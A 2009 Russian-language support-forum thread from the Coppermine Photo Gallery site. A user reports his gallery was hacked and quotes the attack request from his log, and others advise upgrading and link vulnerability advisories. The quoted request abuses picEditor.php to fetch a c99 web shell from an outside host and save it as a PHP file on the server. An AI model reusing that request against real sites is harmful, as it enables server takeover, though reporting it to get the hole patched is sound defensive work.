News:

CPG Release 1.6.29
During HTML5 upload, keep pseudo blank code 200 messages from triggering error condition
added Russian language
correct failure to use theme menu icons in album manager
minor vulnerabilities mitigation

Main Menu

Срочно ! Взломали фотогалерею. Привожу при

Started by pansionat, February 02, 2009, 06:40:06 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

pansionat

February 02, 2009, 06:40:06 PM Last Edit: February 04, 2009, 07:41:45 PM by Makc666
Срочно ! Взломали фотогалерею. К сожалению не очень сильно знаю английский. Но вот привожу лог залива постороних файлов через дырку в скрипте:
мой сайт/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt&CURRENT_PIC[filename]=/1.php

Надеюсь подправят уязвимость 

MISHA

#1
February 03, 2009, 01:53:13 PM
версия 4.18 ? вроде там была уязвимость
Что бы Ктулху не воскрес, подпишись на RSS

pansionat

#2
February 03, 2009, 04:54:37 PM
У меня версия этого файла 1.4.16
Но дело в том, что я сравнил файлы версий и разница тольв этом
Версия 1.4.16
<? starttable("100%", $lang_editpics_php['crop_title'], 3); ?>

Версия 1.4.19
<?php starttable("100%", $lang_editpics_php['crop_title'],?>

Неужели такое незначительное изменение устраняет проблему ?

MISHA

#3
February 04, 2009, 01:32:36 AM
я в этом полный ноль, советую обновить.
Что бы Ктулху не воскрес, подпишись на RSS

Makc666

#4
February 04, 2009, 07:45:31 PM Last Edit: February 24, 2009, 11:23:16 PM by Makc666
То, что у Вас сделали, это уязвимость найденная и исправленная в версии 1.4.17
http://coppermine-gallery.com/forum/index.php/topic,51787.0.html

Также была и версия 1.4.19, которая тоже имела дыру:
http://coppermine-gallery.com/forum/index.php/topic,54235.0.html

Хочу обратить внимание, что уже вышла новая версия 1.4.20, где была исправлена серьезная уязвимость версии 1.4.19!
Print
Go Up Pages1
User actions